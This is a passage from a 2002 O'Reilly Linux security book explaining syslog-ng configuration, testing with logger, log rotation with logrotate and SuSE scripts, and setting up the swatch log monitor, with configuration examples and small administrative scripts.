the local network interface whose IP address is 192. 168.190.190. The source s_udpmessages, however, accepts all UDP messages received on UDP port 514 on all local network interfaces. Besides ip() and port(), there’s one more source option I’d like to cover. max_ connections(), which can only be used in tcp() and unix_stream() sources, restricts the number of simultaneous connections from a given source that syslog-ng will accept. This is a tradeoff between security and performance: if this number is high, then few messages will be dropped when the server is under load, but at the expense of resources. If this number is low, the chance that logging activity will bog down the server is minimized, but whenever the number of maximum connections is reached, messages will be dropped until a connection is freed up. The correct syntax for max-connections() is simple: specify a positive integer between the parentheses. For example, let’s adapt the tcp() source from Example 10-15 to accept a maximum of 100 concurrent TCP connections from remote hosts: source s_tcpmessages { tcp( ip( port(10514) max-connections(100) ); }; By default, max-connections() is set to 100 for unix-stream() sources and 10 for tcp() sources. By the way, TCP port 514 is the default listening port not only for syslog-ng, but also for rshd. This isn’t a big deal, for the simple reason that rshd has no business run- ning on an ostensibly secure Internet-accessible system. If, for example, you wish to use both syslog-ng and rshd on an intranet server (even then I recommend sshd instead), then you should specify a different (unused) port for syslog-ng to accept TCP connections on. Destinations syslog-ng can be configured to send messages to the same places syslog can: ASCII files, named pipes, remote hosts via UDP, and TTYs. In addition, syslog-ng can send Example 10-15. tcp() and udp() sources source s_tcpmessages { tcp( ip( port(10514) ); }; source s_udpmessages { udp(); }; This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 342 | Chapter 10: System Log Management and Monitoring messages to Unix sockets, remote hosts via TCP, and to the standard inputs of pro- grams. Table 10-9 lists the allowed destination types (called “drivers”) in Syslog-ng. As with ordinary syslog, the most important type of destination is file(). Unlike with syslog, Syslog-ng supports filename-expansion macros and a number of options that give one much more granular control over how log files are handled. When you specify the name of a file for syslog-ng to write messages to, you may use macros to create all or part of the filename. For example, to tell syslog-ng to write messages to a file whose name includes the current day, you could define a destina- tion like this: destination d_dailylog { file("/var/log/messages.$WEEKDAY"); }; When Syslog-ng writes to this particular destination, it will use the filename /var/log/ messages.Tues, /var/log/messages.Wed, etc., depending on what day it is. See Table 10-10 for a complete list of supported filename macros. Table 10-9. Supported destination drivers in syslog-ng.conf Driver Description file("filename[$MACROS]" ) Write messages to standard ASCII-text log file. If file doesn’t exist, syslog-ng will create it. Macros may be used within or in lieu of a file- name; these allow dynamic naming of files (see Table 10-10). tcp("address" [port(#);] ) TransmitmessagesviaTCPtothespecifiedTCPport(default=514)on the specified IP address or hostname. (You must specify an address or name.) udp("address" [port(#);] ) Transmit messages via UDP to the specified UDP port (default=514) onthespecifiedIPaddressorhostname.(Youmustspecifyanaddress or name.) pipe("pipename") Send messages to a named pipe such as /dev/xconsole. unix_stream("filename" [options]) Send messages in connection-oriented stream mode to a Unix socket such as /dev/log. unix_dgram("filename" [options]) Send messages in connectionless datagram mode to a Unix socket such as /dev/log. usertty( username ) Send messages to specified user’s console. program("/path/to/program") Send messages to standard input of specified program with specified options. Table 10-10. Macros supported in file() destinations Macro Expands to PROGRAM The name of the program that sent the message HOST The name of the host that originated the message FACILITY The facility to which the message was logged This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 343 As with syslog, if a file specified in a file() destination doesn’t exist, syslog-ng will cre- ate it. Unlike syslog, Syslog-ng has a number of options that can be implemented both globally and on a per-log-file basis. (Global settings are overridden by per-log- file settings, allowing you to create “general rules” with exceptions.) For example, whether and how syslog-ng creates new directories for its log files is controlled via the options create_dirs(), dir_owner(), dir_group(), and dir_perm(). Example 10-16 illustrates the use of these options within a destination{} statement. Example 10-16 also happens to show the default values of the dir_owner, dir_group(), and dir_perm() options. While this may seem unrealistic (why would anyone go to the trouble of setting an option to its default?), it’s necessary if nondefaults are speci- fied in a global options{} statement and you want the default values used for a spe- cific file—remember, options set in a destination{} statement override those set in an options{} statement. Other global/file-specific options can be used to set characteristics of the log file itself: owner(), group(), and perm(), which by default are set to root, root, and 0600, respectively. In case you’re wondering, there is no create_file() option—syslog-ng has the irrevocable ability to create files (unless that file’s path includes a nonexistent directory and create_dirs() is set to no). Example 10-17 shows a destination defini- tion that includes these options. PRIORITY or LEVEL (synonyms) The designated priority level YEAR The current yeara MONTH The current montha DAY The current daya WEEKDAY The current day’s name (Monday, etc.)a HOUR The current houra MIN The current minutea SEC The current seconda a If the global option use_time_recvd() is set to yes, then this macro’s value will be taken from the local system time when the message was received; otherwise, for messages from remote hosts, the timestamp contained in the message will be used. Example 10-16. Controlling a file() destination’s directory-creating behavior destination d_mylog { file("/var/log/ngfiles/mylog" create_dirs(yes) dir_owner(root) \ dir_group(root) dir_perm(0700)); }; Example 10-17. Options that affect file properties destination d_micklog { file("/var/log/micklog" owner(mick) group(wheel) perm(0640)); }; Table 10-10. Macros supported in file() destinations (continued) Macro Expands to This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 344 | Chapter 10: System Log Management and Monitoring The other file() option we’ll cover here is sync(), which can be used to limit the fre- quency with which log files are synchronized. This is analogous to syslog’s “-” pre- fix, but much more granular: whereas the “-” merely turns off synchronization, file() accepts a numeric value that delays synchronization to as many or as few messages as you like. The higher the value, the more messages are cached prior to filesystem synchroniza- tion and, therefore, the fewer “open for read” actions on the filesystem. The lower the number, the lower the chances of data loss and the lower the delay between a message being processed and written to disk. By default, sync() is set to zero, meaning “synchronize after each message.” In gen- eral, the default or a low sync() value is preferable for low-volume scenarios, but numbers in the 100s or even 1,000s may be necessary in high-volume situations. A good rule of thumb is to set this value to the approximate number of log-message lines per second your system must handle at peak loads. If you use a log monitor such as Swatch (described later in this chap- ter) to be alerted of attacks in progress, don’t set sync() too high. If an intruder deletes a log file, all of Syslog-ng’s cached messages will be lost without having been parsed by the log monitor. (Log monitors parse messages as they are written, not beforehand.) Filters And now we come to some of the serious magic in Syslog-ng: message filters. Filters, while strictly optional, allow you to route messages based not only on priority/level and facility (which syslog can do), but also on the name of the program that sent the message, the name of the host that forwarded it over the network, a regular expres- sion evaluated against the message itself, or even the name of another filter. A filter{} statement consists of a label (the filter’s name) and one or more criteria con- nected by operators (and, or, and not are supported). Table 10-11 lists the different types of criteria that a filter{} statement may contain. Table 10-11. filter{} functions Function (criterion) Description facility( facility-name ) Facility to which the message was logged (see Table 10-1 for facility names). priority( priority-name ) priority( priority-name1, priority-name2, etc. ) priority( priority-name1 .. priority-name2 ) Priority assigned to the message (see Table 10-2 for priority-names); a list of priorities separated by commas may be specified, or a range of priorities expressed as two priorities (upper and lower limits) separated by two periods. level( priority-name ) Same as priority(). program( program-name ) Program that created the message. host( hostname ) Host from which message was received. This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 345 Example 10-18 shows several filter{} statements taken from the default syslog-ng.conf file included in Debian 2.2’s syslog-ng package. The first line in Example 10-17, filter f_mail, matches all messages logged to the mail facility. The second filter, f_debug, matches all messages not logged to the auth, authpriv, news, and mail facilities. The third filter, f_messages, matches messages of priority levels info through warn, except those logged to the auth, authpriv, cron, daemon, mail, and news facilities. The last filter, called f_cother, matches all messages of priority levels debug, info, notice, and warn, and also all messages logged to the daemon and mail facilities. When you create your own filters, be sure to test them using the logger command. See the section entitled “Testing System Logging with logger” later in this chapter. Log statements Now we combine the elements we’ve just defined (sources, filters, and destinations) into log{} statements. Arguably, these are the simplest statements in syslog-ng.conf: each consists only of a semicolon-delimited list of source(), destination(), and, optionally, filter() references. (Filters are optional because a log{} statement contain- ing only source() and destination() references will send all messages from the speci- fied sources to all specified destinations.) Elements from several previous examples are combined in Example 10-19, which culminates in several log{} statements. match( regular-expression ) Regular expression to evaluate against the message’s body. filter( filter-name ) Other filter to evaluate. Example 10-18. Filters filter f_mail { facility(mail); }; filter f_debug { not facility(auth, authpriv, news, mail); }; filter f_messages { level(info .. warn) and not facility(auth, authpriv, cron, daemon, mail, news); }; filter f_cother { level(debug, info, notice, warn) or facility(daemon, mail); }; Example 10-19. Another sample syslog-ng.conf file source s_loc { unix-stream("/dev/log"); internal(); }; source s_tcpmessages { tcp( ip(; port(10514);); }; destination d_dailylog { file("/var/log/messages.$WEEKDAY"); }; destination d_micklog { file("/var/log/micklog" owner(mick) perm(0600)); }; filter f_mail { facility(mail); }; Table 10-11. filter{} functions (continued) Function (criterion) Description This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 346 | Chapter 10: System Log Management and Monitoring As you can see in this example, all messages from the host are writ- ten to the log file /var/log/micklog, as are all local mail messages. Messages that match the f_messages() filter are written to the log file /var/log/messages. $WEEKDAY, e.g., /var/log/Sun, /var/log/Mon, etc. Example 10-19 isn’t very realistic, though: no nonmail messages with priority-level higher than warn are dealt with. This begs the question, “Can I get syslog-ng to filter on ‘none of the above?’” The answer is yes: to match all messages that haven’t yet matched filters in previous log{} statements, you can use the built-in filter DEFAULT. The following line, if added to the bottom of Example 10-18, will cause all messages not processed by any of the prior three log{} statements to be written to the daily log file: log { source(s_loc); filter(DEFAULT); destination(d_dailylog); }; Advanced Configurations As you’re hopefully convinced of by this point, Syslog-ng is extremely flexible, so much so that it isn’t feasible to illustrate all possible Syslog-ng configurations. I would be remiss, however, if I didn’t list at least one advanced syslog-ng.conf file. Example 10-20 shows a setup that causes syslog-ng to watch out for login failures and access denials by matching messages against a regular expression and then send- ing the messages to a shell script (listed in Example 10-21). filter f_messages { level(info .. warn) and not facility(auth, authpriv, cron, daemon, mail, news); }; log { source(s_tcpmessages); destination(d_micklog); }; log { source(s_loc); filter(f_mail); destination(d_micklog); }; log { source(s_loc); filter(f_messages); destination(d_dailylog); }; Example 10-20. Using syslog-ng as its own log watcher # WARNING: while this syslog-ng.conf file is syntactically correct and complete, it is # intended for illustrative purposes only -- entire categories of message # are ignored! source s_local { unix_stream("dev/log"); internal(); }; filter f_denials { match("[Dd]enied|[Ff]ail"); }; destination d_mailtomick { program("/usr/local/sbin/mailtomick.sh"); }; log { source(s_local); filter(f_denials); destination(d_mailtomick); }; Example 10-21. Script for emailing log messages #!/bin/bash # mailtomick.sh # Script which listens for standard input and emails each line to mick # Example 10-19. Another sample syslog-ng.conf file (continued) This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Syslog-ng | 347 The most important lines in Example 10-20 are the filter f_denials and the destina- tion d_mailtomick. The filter uses a match() directive containing a regular expression that matches the strings “denied,” “Denied,” “Fail,” and “fail.”* The destination d_ mailtomick sends messages via a program() declaration to the standard input of a script I wrote called /usr/local/sbin/mailtomick.sh. Before we go further in the analysis, here’s an important caveat: program() opens the specified program once and leaves it open until syslog-ng is stopped or restarted. Keep this in mind when deciding whether to use pipe() or program() (i.e., pipe() doesn’t do this), and in choosing what sort of applications you invoke with program(). In some cases, keeping a script open (actually a bash process) is a waste of resources and even a security risk (if you run syslog-ng as root). Furthermore, the particular use of email in Examples 10-19 and 10-20 introduces the possibility of Denial of Service attacks (e.g., fill- ing up the system administrator’s mailbox). But under the right cir- cumstances, such as on a non-Internet-accessible host that has a few CPU cycles to spare, this is a legitimate use of Syslog-ng. The script itself, /usr/local/sbin/mailtomick.sh, simply reads lines from the standard input and emails each line to mick@pinheads-on-ice.net. Since syslog-ng needs to keep this script open, the read command is contained in an endless loop. This script will run until the syslog-ng process that invoked it is restarted or killed. In the interest of focusing on the most typical uses of Syslog-ng, I’ve listed some syslog- ng.conf options without giving examples of their usage and omitted a couple of other options altogether. Suffice it to say that the global/file option log_fifo_size() and the global options time_reap(), time_reopen(), gc_idle_threshold(), and gc_busy_threshold() are useful for tuning syslog-ng’s performance to fit your particular environment. The official (maintained) documentation for Syslog-ng is the Syslog-ng Reference Manual. PostScript, SGML, HTML, and ASCII text versions of this document are included in the /doc directory of Syslog-ng’s source-code distribution. For advanced or otherwise unaddressed issues, the best source of Sys- log-ng information is the Syslog-ng mailing list and its archives. See http://lists.balabit.hu/mailman/listinfo/syslog-ng for subscription infor- mation and archives. while read line; do echo $line | mail -s "Weirdness on that Linux box" mick@pinheads-on-ice.net done * If you’re completely new to regular expressions, I highly recommend Mastering Regular Expressions by Jef- frey E. F. Friedl (O’Reilly). Example 10-21. Script for emailing log messages (continued) This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 348 | Chapter 10: System Log Management and Monitoring Testing System Logging with logger Before we leave the topic of system-logger configuration and use, we should cover a tool that can be used to test your new configurations, regardless of whether you use syslog or Syslog-ng: logger. logger is a command-line application that sends mes- sages to the system logger. In addition to being a good diagnostic tool, logger is espe- cially useful for adding logging functionality to shell scripts. The usage we’re interested in here, of course, is diagnostics. It’s easiest to explain how to use logger with an example. Suppose you’ve just reconfigured syslog to send all daemon messages with priority “warn” to /var/log/warnings. To test the new syslog.conf file, you’d first restart syslogd and klogd and then you’d enter a command like the one in Example 10-22. As you can see, logger’s syntax is simple. The -p parameter allows you to specify a facility.priority selector. Everything after this selector (and any other parameters or flags) is taken to be the message. Because I’m a fast typist, I often use while…do…done statements in interactive bash sessions to run impromptu scripts (actually, just complex command lines). Example 10-23’s sequence of commands works interactively or as a script. This sends tests messages to the daemon facility for each of all eight priorities. Example 10-24, presented in the form of an actual script, generates messages for all facilities at each priority level. Example 10-22. Sending a test message with logger mylinuxbox:~# logger -p daemon.warn "This is only a test." Example 10-23. Generating test messages from a bash prompt mylinuxbox:~# for i in {debug,info,notice,warning,err,crit,alert,emerg} > do > logger -p daemon.$i "Test daemon message, level $I" > done Example 10-24. Generating even more test messages with a bash script #!/bin/bash for i in {auth,auth-priv,cron,daemon,kern,lpr,mail,mark,news,syslog,user,uucp,local0, local1,local2,local3,local4,local5,local6,local7} # (this is all one line!) do for k in {debug,info,notice,warning,err,crit,alert,emerg} do logger -p $i.$k "Test daemon message, facility $i priority $k" done done This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Managing System-Log Files | 349 Logger works with both syslog and Syslog-ng. Managing System-Log Files Configuring and fine-tuning your system-logging facilities is extremely important for system security and general diagnostics. But if your logs grow too large and fill up their filesystem, all that work may come to naught. As with syslog itself, most Linux distributions come with a preconfigured log-rota- tion scheme. As with syslog, while this scheme tends to work adequately for many users, it’s too important a mechanism to take for granted: it behooves you to under- stand, periodically evaluate, and, if necessary, customize your log-management setup. Log Management in Red Hat 7 and Debian 2.2: /sbin/logrotate Both Red Hat 7 and Debian 2.2 use a binary program called logrotate to handle sys- tem-log growth. In fact, they use very similar implementations of logrotate: global options and low-level (system) log files are addressed in /etc/logrotate.conf, and appli- cation-specific configuration scripts are kept in /etc/logrotate.d/. When logrotate is run, all scripts in /etc/logrotate.d are included into logrotate.conf and parsed as one big script. This makes logrotate’s configuration very modular: when you install an RPM or DEB package (of software that creates logs), your pack- age manager automatically installs a script in /etc/logrotate.d, which will be removed later if you uninstall the package. Actually, the include directive in logrotate.conf may be used to specify additional or different directories and files to include. In no event, how- ever, should you remove the statement that includes /etc/logrotate.d if you use Red Hat or Debian, both of whose package managers depend on this directory for package-specific log-rotation scripts. Syntax of logrotate.conf and its included scripts There are really only two types of elements in logrotate.conf and its included scripts: directives (i.e., options) and log-file specifications. A directive is simply a parameter or a variable declaration; a log-file specification is a group of directives that apply to a specific log file or group of log files. In Example 10-25, we see a simple /etc/logrotate.conf file. This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 350 | Chapter 10: System Log Management and Monitoring In Example 10-25, the global options at the top may be thought of as the default log- file specification. Any directive for a specific log file takes precedence over the global options. Accordingly, we see in this example that although by default logs are rotated once a month and that four archives will be kept, the file /var/log/messages will be rotated not on the basis of time, but on size. However, the other global directives will still apply: four old copies will be kept; immediately after a log is renamed (which is how they’re “rotated”), a newly empty current log file will be created (“touched”); and error messages will be emailed to root. logrotate supports a large number of different directives, but in practice, you’ll prob- ably spend more time tweaking the subscripts placed in logrotate.d than you will writing scripts from scratch. With that in mind, Table 10-12 lists some commonly encountered logrotate directives. A complete list is provided in the manpage logrotate(8). Example 10-25. Simple logrotate.conf file # Very simple logrotate.conf file # Global options: rotate logs monthly, saving four old copies and sending # error-messages to root. After "rotating out" a file, touch a new one monthly rotate 4 errors root create # Keep an eye on /var/log/messages /var/log/messages { size 200k create postrotate /bin/kill -HUP `cat /var/run/syslog-ng.pid 2> /dev/null` 2> /dev/null || true endscript } Table 10-12. Common logrotate directives Directive Description /path/to/logfile { directive1 directive2 etc. } Log file specification header/footer (i.e., “apply these direc- tives to the file /path/to/logfile”). Whitespace is ignored. Applicable global directives are also applied to the log file, but when a given directive is specified both globally and locally (within a log file specification), the local setting over- rules the global one. rotate number Tells logrotate toretain number oldversionsof thespec- ified log file. Setting this to zero amounts to telling logrotate to overwrite the old log file. This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Managing System-Log Files | 351 daily | weekly | monthly | size=number_bytes Thecriterionforrotatingthespecifiedfile:eitherbecauseone day or week or month has passed since the last rotation, or because the file’s size has reached or exceeded number_ bytes since the last time logrotate was run. Note that if number_bytes is a number, bytes are assumed; if expressed as a number followed by a lowercase “k,” Kilobytes are assumed; if expressed as a number fol- lowed by a capital “M,” Megabytes are assumed. mail [username|mail@address] Email old files to the specified local user or email address rather than deleting them. errors [username|email@address] Email logrotate error messages to the specified local user or email address. compress Use gzip to compress old versions of log files. copytruncate Instead of renaming the current log file and creating a new (empty) one, move most of its data out into an archive file. Accommodates programs that can’t interrupt logging (i.e., that need to keep the log file open for writing continuously). create [octalmode owner group] Recreatethe(nowempty)logfileimmediatelyafterrotation. If specified, set any or all of these properties: octalmode (file- mode in octal notation—e.g., 0700), owner, and group properties. ifempty | notifempty By default, logrotate will rotate a file even if it’s empty. notifempty cancels this behavior; ifempty restores it (e.g., overriding a global notifempty setting). include file_or_directory When parsing logrotate.conf, include the specified file or the files in the specified directory. missingok | nomissingok Bydefault,logrotatewillreturnamessageifalogfiledoesn’t exist.nomissingokcancelsthisbehavior(i.e.,tellslogrotateto skip that log file quietly); missingok restores the default behavior (e.g., overriding a global nomissingok setting). olddir dir | noolddir Tellslogrotatetokeepoldversionsofalogfileindir,whereas noolddir tells logrotate to keep old versions in the same direc- tory as the current version (noolddir is the default behavior). postrotate line1 line2 etc. endscript Execute specified lines after rotating the log file. Can’t be declared globally. Typically used to send a SIGHUP to the application that uses the log file. prerotate line1 line2 etc. endscript Execute specified lines before rotating the log file. Can’t be declared globally. Table 10-12. Common logrotate directives (continued) Directive Description This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 352 | Chapter 10: System Log Management and Monitoring Running logrotate In both Red Hat 7 and Debian 2.2, logrotate is invoked by the script /etc/cron.daily/ logrotate, which consists of a single command: /usr/sbin/logrotate /etc/logrotate.conf This doesn’t necessarily mean that logs are rotated daily; it means that logrotate checks each log file daily against its configuration script and rotates or doesn’t rotate the log file accordingly. If you want logrotate to be run less frequently, you can move this script to /etc/cron. weekly or even /etc/cron.monthly (though the latter is emphatically not recom- mended unless logrotate is, for some strange reason, configured to rotate each and every file monthly). Log Management in SuSE 7 Log rotation in SuSE, as with so much else, is configured at a gross level in /etc/rc. config (the configuration file for suseconfig, which is the primary backend engine of yast). This file contains a variable called MAX_DAYS_FOR_LOG_FILES, which you Just What Do We Mean By “Rotate?” All log-management mechanisms involve periodically moving/renaming a log file to an archive copy and creating a new (empty) log file. Rotation is necessary when multiple archive copies are maintained. In the most common log-rotation scheme, a set of static filenames is maintained. For example, messages, messages.1, messages.2, messages.3 is a typical three-archive file- name set—messages being the “current” log file and messages.3 being the oldest archive. In this scheme, rotation is achieved by coping the second-to-oldest file over the oldest file (e.g., mv messages.2 messages.3). The third-oldest file’s name is then changed to that of the second-oldest file’s, and so forth, until the current file is renamed and a new (empty) “current” log file is created (e.g., mv messages messages.1; touch messages). This is how logrotate behaves when its rotate parameter is set to a nonzero value. In the second common mechanism, archive filenames are unique (e.g., messages, messages.20010807, messages.20010708, etc.). In this case, rotation is a simple matter of changing the current file’s name and then creating a new (empty) “current” log file (e.g., mv messages messages.20010928; touch messages). The final step is to compare the age of the oldest log archive file to a “maximum age” setting and to delete it if it’s reached that age. This second scheme is used by SuSE’s aaa_base_rotate_logs script (covered later in this chapter). This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Using Swatch for Automated Log Monitoring | 353 can use to set the maximum number of days system logs are kept (by default, 365). In addition, the log-rotation tools themselves come preconfigured and preactivated. Chances are, however, that you’ll need to tweak SuSE’s log-management setup more granularly than MAX_DAYS_FOR_LOG_FILES, especially if you install Syslog-ng and disable syslog. As it happens, SuSE’s log-rotation scheme is less powerful but also much simpler than Red Hat’s and Debian’s logrotate. SuSE uses a script called /etc/cron.daily/aaa_base_rotate_logs for day-to-day log rota- tion. This script shouldn’t be manually edited; its behavior is controlled by the file /etc/ logfiles, which is simply a list of the files you wish to rotate along with the maximum sizes you want them to reach, the permissions and ownerships they should have, and the startup script (if any) that should be restarted after rotation is done. Example 10-26 is an excerpt from the default /etc/logfiles from SuSE 7.1. In the first noncomment line, all log files whose name begins /var/log/mgetty will be rotated after exceeding 1,024 kilobytes, after which they’ll be rotated to new files whose permissions are -rw-r--r-- and that are owned by user root and group root. The third line states that the file /var/log/httpd/access_log should be rotated after exceeding 4,096 kilobytes, should be recreated with permissions -rw-r--r--, owned by user root and group root, and after rotation is done, the startup script /etc/init.d/ apache should be restarted. Since the maximum age of all log files is set globally in /etc/rc.config, take care not to set the maximum size of a frequently written-to file (such as /var/log/messages) too high. If this happens and if the maximum age is high enough, your logs may fill their volume. Speaking of which, I highly recommend the use of a dedicated /var partition on any machine that acts as a server; a full /var partition is much less likely to cause disrup- tive system behavior (e.g., crashing) than a full root partition. Using Swatch for Automated Log Monitoring Okay, you’ve painstakingly configured, tested, and fine-tuned your system logger to sort system messages by type and importance and then log them both to their respec- tive files and to a central log server. You’ve also configured a log-rotation scheme that keeps as much old log data around as you think you’ll need. Example 10-26. Excerpts from /etc/logfiles # /etc/logfiles - This file tells cron.daily, which log files have to be watched # # File max size mode ownership service # (reload if changed) /var/log/mgetty.* +1024k 644 root.root /var/log/messages +4096k 640 root.root /var/log/httpd/access_log +4096k 644 root.root apache /var/squid/logs/access.log +4096k 640 squid.root This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 354 | Chapter 10: System Log Management and Monitoring But who’s got the time to actually read all those log messages? swatch (the “Simple WATCHer”) does. swatch, a free log-monitoring utility written 100% in Perl, monitors logs as they’re being written and takes action when it finds something you’ve told it to look out for. Swatch does for logs what tripwire does for system-file integrity. Installing Swatch There are two ways to install swatch. First, of course, is via whatever binary package of swatch your Linux distribution of choice provides. (I use the term loosely here; “executable package” is more precise.) The current version of Mandrake has an RPM package of swatch, but none of the other most popular distributions (i.e., Red Hat, SuSE, Slackware, or Debian) appear to. This is just as well, though, since the second way to install swatch is quite interest- ing. swatch’s source distribution, available from http://www.stanford.edu/~atkins/ swatch, includes a sophisticated script called Makefile.PL that automatically checks for all necessary Perl modules (see “Should We Let Perl Download and Install Its Own Modules?” later in this chapter) and uses Perl 5’s CPAN functionality to down- load and install any modules you need; it then generates a Makefile that can be used to build swatch. After you’ve installed the required modules, either automatically from swatch’s Makefile.PL script or manually (and then running perl Makefile.PL), Makefile.PL should return the contents of Example 10-27. Once Makefile.PL has successfully created a Makefile for swatch, you can execute the following commands to build and install it: make make test make install make realclean The make test command is optional but useful: it ensures that swatch can properly use the Perl modules we just went to the trouble of installing. Example 10-27. Successful Makefile.PL run [root@barrelofun swatch-3.0.1]# perl Makefile.PL Checking for Time::HiRes 1.12 ... ok Checking for Date::Calc ... ok Checking for Date::Format ... ok Checking for File::Tail ... ok Checking if your kit is complete... Looks good Writing Makefile for swatch [root@barrelofun swatch-3.0.1]# This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Using Swatch for Automated Log Monitoring | 355 Should We Let Perl Download and Install Its Own Modules? The Comprehensive Perl Archive Network (CPAN) is a network of Perl software archives from around the world. Perl Version 5.6.x includes modules (CPAN and CPAN::FirstTime, among others) that allow it to fetch, verify the checksums of, and even use gcc to compile Perl modules from CPAN sites on the Internet. In-depth descriptions of CPAN and Perl’s CPAN functionality are beyond this chapter’s scope, but I have one hint and one warning to offer. First, the hint. To install the module Example::Module (not a real Perl module), you enter the command: perl -MCPAN -e "install Example::Module" If it’s the first time you’ve used the -MCPAN flag, the module CPAN::FirstTime will be triggered and you’ll be asked to choose from various options as to how Perl should fetch and install modules from CPAN. These are well-phrased questions with reason- able defaults. But do pay attention to the output while this command executes: the module you’re installing may depend on other modules and may require you to go back and execute, e.g.: perl -MCPAN -e "install Example::PreRequisite" before making a second attempt at installing the first module. Now for the warning: using CPAN is neither more nor less secure than downloading and installing other software from any other Internet source. On the one hand, before being installed, each downloaded module is automatically checked against a checksum that incorporates a cryptographically strong MD5 hash. On the other hand, this hash is intended to prevent corrupt downloads from going unnoticed, not to provide secu- rity per se. Furthermore, even assuming that a given package’s checksum probably won’t be replaced along with a tampered-with module (a big assumption), all this protects against is the unauthorized alteration of software after it’s been uploaded to CPAN by its author. There’s nothing to stop an evil registered CPAN developer (anybody may register as one) from uploading hostile code along with a valid checksum. But of course, there’s nothing to stop that evil developer from posting bad stuff to Source- Forge or FreshMeat, either. Thus, if you really want to be thorough, the most secure way to install a given Perl module is to: 1. Identify/locate the module on http://search.cpan.org. 2. Follow the link to CPAN’s page for the module. 3. Download the module not from CPAN, but from its developer’s official web site (listed under “Author Information” in the web page referred to earlier in Step 2). 4. If available, also download any checksum or hash provided by the developer for the tarball you just downloaded. —continued— This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 356 | Chapter 10: System Log Management and Monitoring swatch Configuration in Brief Since the whole point of swatch is to simplify our lives, configuring swatch itself is, well, simple. swatch is controlled by a single file, $HOME/.swatchrc by default. This file contains text patterns, in the form of regular expressions, that you want swatch to watch for. Each regular expression is followed by the action(s) you wish to swatch to take whenever it encounters that text. For example, suppose you’ve got an Apache-based web server and you want to be alerted any time someone attempts a buffer-overflow attack by requesting an extremely 5. Use gpg, md5, etc. to verify that the tarball matches the hash. 6. Unzip and expand the tarball, e.g., tar -xzvf groovyperlmod.tar.gz. 7. If you’re a Righteously Paranoid Kung-Fu Master or aspire to becoming one, review the source code for sloppiness and shenanigans, report your findings to the developer or the world at large, and bask in the open source community’s awe and gratitude. (I’m being flippant, but open source code is truly open only when people bother to examine it!) Follow the module’s building and installing directions, usually contained in a file called INSTALL and generally amounting to something like: perl ./Makefile.PL make make test make install Note that if the modules you need are being brought to your attention by swatch’s Makefile.PL script, then to use the paranoid installation method, you’ll want to write down the needed module names and kill that script (via plain old CONTROL-c) before installing the modules and rerunning swatch’s Makefile.PL. Before I forget, there’s actually a third way to install missing Perl modules: from your Linux distribution’s FTP site or CDROM. While none approach CPAN’s selection, most Linux distributions have packaged versions of the most popular Perl modules. Following are the modules you need for swatch and the packages that contain them in Red Hat 7 and Debian 2.2: • Perl ModuleRed Hat 7 RPMDebian “deb” package • Date::Calcperl-Date-Calclibdate-calc-perl • Time::HiResperl-Time-HiReslibtime-hires-perl • Date::Formatperl-TimeDatelibtimedate-perl • File::Tailperl-File-Taillibfile-tail-perl None of this may seem terribly specific to swatch, and indeed it isn’t, but it is impor- tant—more and more useful utilities are being released either as Perl modules or as Perl scripts that depend on Perl modules, so the chances are that swatch will not be the last Makefile.PL-based utility you install. Understanding some ramifications of all this module madness is worth the liter of ink I just spent on it, trust me. This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. Using Swatch for Automated Log Monitoring | 357 long filename (URL). By trying this yourself against the web server while tailing its /var/ apache/error.log, you know that Apache will log an entry that includes the string “File name too long.” Suppose further that you want to be emailed every time this happens. Example 10-28 shows what you’d need to have in your .swatchrc file. As you can see, the entry begins with a watchfor statement, followed by a regular expression. If you aren’t yet proficient in the use of regular expressions, don’t worry: this can be as simple as a snippet of the text you want swatch to look for, spelled out verbatim between two slashes. Swatch will perform your choice of a number of actions when it matches your regu- lar expression. In this example, we’ve told swatch to send email to mick\@visi.com, with a subject of BufferOverflow_attempt. Note the backslash before the @ sign— without it, Perl will interpret the @ sign as a special character. Note also that if you want spaces in your subject-line, each space needs to be escaped with a backslash— e.g., subject=Buffer\ Overflow\ attempt. Actions besides sending email include the ones in Table 10-13. For more details on configuring these and the other actions that swatch supports, see the swatch(1) manpage. If you use Syslog-ng, you may be able to use some combination of match() filters, program() destinations, and pipe() destinations to achieve most of what swatch does. However, swatch’s throttle parameter is an important advantage: whereas Syslog-ng acts on every message that matches a given filter, throttle gives swatch the intelligence to ignore repeated occurrences of a given event, potentially preventing minor events from becoming major annoyances. Example 10-28. Simple entry in .swatchrc watchfor /File name too long/ mail addresses=mick\@visi.com,subject=BufferOverflow_attempt Table 10-13. Some actions swatch can take Action (keyword) Description echo=normal, underscore, blue, inverse, etc. Print matched line to console, with or without special text mode (default mode is “normal”). bell N Echo the line to console, with “beep” sounded N times (default = 1). exec command Execute the command or script command. pipe command Pipe the line to the command command. throttle HH:MM:SS Wait for HH:MM:SS (period of time) after a line triggers a match, before per- forming actions on another match of the same expression. Helps prevent Denial of Service attacks via swatch (e.g., deliberately triggering huge num- bers of swatch events in a short period). This is the Title of the Book, eMatter Edition Copyright © 2002 O’Reilly & Associates, Inc. All rights reserved. 358 | Chapter 10: System Log Management and Monitoring Let’s take that example a step further. Suppose in addition to being emailed about buffer-overflow attempts, you want to know whenever someone hits a certain web page, but only if you’re logged on to a console at the time. In the 